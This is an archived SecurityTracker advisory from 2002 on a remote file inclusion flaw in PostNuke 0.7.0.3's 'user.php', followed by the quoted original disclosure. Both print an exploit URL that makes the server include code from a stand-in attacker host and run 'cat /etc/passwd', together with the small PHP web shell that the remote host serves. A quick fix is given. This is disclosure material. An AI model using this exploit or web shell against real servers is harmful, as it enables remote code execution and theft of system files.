SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   PostNuke Vendors:   [Multiple Authors/Vendors]
PostNuke 'user.php' Flaw Lets Remote Users Specify a Remote Server Path for the $caselist Variable, Allowing Arbitrary Code to Be Executed on the PostNuke Server
SecurityTracker Alert ID:  1003917
SecurityTracker URL:  http://securitytracker.com/id/1003917
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 29 2002
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 0.7.0.3
Description:   A vulnerability was reported in PostNuke. A remote user can cause arbitrary PHP code to be executed on the server.

It is reported that a remote user can exploit a bug in the file 'user.php' to append the $caselist array with a user-supplied value. This allows the remote user to specify PHP code on a remote server so that the PHP code will be executed on the target server.

The flaw is reported to be on line 107:

foreach ($caselist as $k=>$v)
{
$ModName = $v['module'];
include "$v[path]/$k";
}
$caselist = array();

A remote user can use the following type of URL to trigger the flaw:

http://[targethost]/user.php?caselist[bad_file.txt][path]=http://bad_host&command=cat%20/etc/passwd

In the above example, the following type of code is required on the malicious server ('bad_host'):

-- start bad_file.txt -----
<pre>
<?php
system($command);
?>
-- end bad_file.txt -----

Impact:   A remote user can cause arbitrary PHP code to be executed by the server.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following quick fix:

put on line 28 :
$caselist = array();

Vendor URL:  www.postnuke.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  postnuke v 0.7.0.3 remote command execution




post nuke is one of popular content management 
system written in php . there are bug in file user.php 
line 107
which user can append $caselist array with their own 
value.

foreach ($caselist as $k=>$v)
{
    $ModName = $v['module'];
    include "$v[path]/$k";
}
$caselist = array();

http://lame_host/user.php?caselist[bad_file.txt][path]
=http://bad_host&command=cat%20/etc/passwd

bad_file.txt (put in bad_host document root):

-- start bad_file.txt -----
<pre>
<?php 
system($command);
?>
-- end bad_file.txt -----

quick fix: 
put on line 28 :
$caselist = array();

http://inetd-secure.net/
http://www.mybsd.org.my/pokleyzz/


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC